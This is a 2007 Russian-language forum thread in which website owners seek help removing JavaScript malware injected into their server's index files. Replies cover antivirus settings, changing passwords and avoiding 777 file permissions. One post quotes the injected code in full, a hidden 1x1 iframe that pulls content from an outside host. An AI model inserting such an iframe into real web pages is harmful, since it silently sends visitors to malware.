mixey Опубликовано 13 августа, 2007 Опубликовано 13 августа, 2007 Как можно вылечить зараженные файлы на сервере (не предлагать ручное удаление вируса)? Вирус: DoS.JS.Dframe.a Операционная система на сервере: Fedora Core Антивирус касперского находит файлы, но лечить отказывается. Заражены файлы index.php (htm, html и пр расширения). Может существуют какие-либо утилиты для удаления вредоносного кода?
radioelectron Опубликовано 13 августа, 2007 Опубликовано 13 августа, 2007 (изменено) Есть Антивирус Касперского для Linux File Server - http://www.kaspersky.ru/anti-virus_linux_file_server Загрузить пробную версию можно отсюда - http://www.kaspersky.ru/anti-virus_fileservers_trial Кстати, компания Untangle совсем недавно назвала Касперского лучшим Linux-антивирусом ЗЫ Внушительный список антивирусов для Линукса (как платных, так и бесплатных) Вы можете посмотреть здесь - http://www.nixp.ru/soft/security_antivir Изменено 14 августа, 2007 пользователем radioelectron
mixey Опубликовано 13 августа, 2007 Автор Опубликовано 13 августа, 2007 Linux File Server и установил. Вирус находит, но не лечит, только удаляет. Хотя нужно чтобы удалил только JSвирусный код. Вручную удалить вирусный код очень тяжело (index файлов около 1500)
radioelectron Опубликовано 13 августа, 2007 Опубликовано 13 августа, 2007 (изменено) Проверьте настройки антивируса - должен быть включен режим лечения (секция [scanner.options], параметр Cure=yes). Также можно управлять приложением с помощью Kaspersky Administration Kit: Вкладка "Параметры", пункт "Лечить зараженные объекты". Изменено 13 августа, 2007 пользователем radioelectron
mixey Опубликовано 14 августа, 2007 Автор Опубликовано 14 августа, 2007 Все установил, режим лечения включен, но файлы не лечатся
radioelectron Опубликовано 14 августа, 2007 Опубликовано 14 августа, 2007 (изменено) Значит, остается только два варианта. Если у Вас лицензия - можете зайти на страницу регистрации для клиентов Лаборатории Касперского. И из персонального кабинета написать в техподдержку конкретно по Вашему продукту. И второй способ - попробовать что-нибудь из этого списка Изменено 14 августа, 2007 пользователем radioelectron
Современник Опубликовано 30 августа, 2007 Опубликовано 30 августа, 2007 (изменено) У меня тоже с этим большая проблема. Сервер Linux, сайт http://kommersant.org.ua Началось всё месяца два назад, когда Google заблокировал мой сайт, ссылаясь на вредоносное ПО а при открытии сайта - АВК дико пищал, что найден вирус - Trojan-Downloader.JS.Psyme.jm - и блокировал сам сайт. Тогда пересмотрел код главной страницы и нашел там такую запись: <iframe src='http://ltds.biz/go.php?id=3240&user_name=gh0st' width='1' height='1' style='visibility: hidden;'></iframe>" Удалил. Через три дня код опять появился на сайте. Я удалил - через неделю то же самое. И так до сих пор. Хорошо, что index страниц там всего три - можно и ручками удалить. Может что посоветуете? P.S. В вирусах я мало что пониманию. А антивирусом ЛК пользуюсь уже лет пять наверное. Лицензия - персональная. Изменено 30 августа, 2007 пользователем Современник
AZЪ Опубликовано 31 августа, 2007 Опубликовано 31 августа, 2007 Пароль на доступ к контенту сайта попробуйте поменять.
radioelectron Опубликовано 31 августа, 2007 Опубликовано 31 августа, 2007 Может что посоветуете? Ни в коем случае нельзя ставить права доступа к файлам 777. У Вас наверняка стоит разрешение на запись, и любой прохожий кулхацкер может запросто перезаписать любой файл вредоносным. Если Вы не понимаете, о чем я говорю - смотрите сюда - http://omsk777.ru/all.php?act=dostup
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти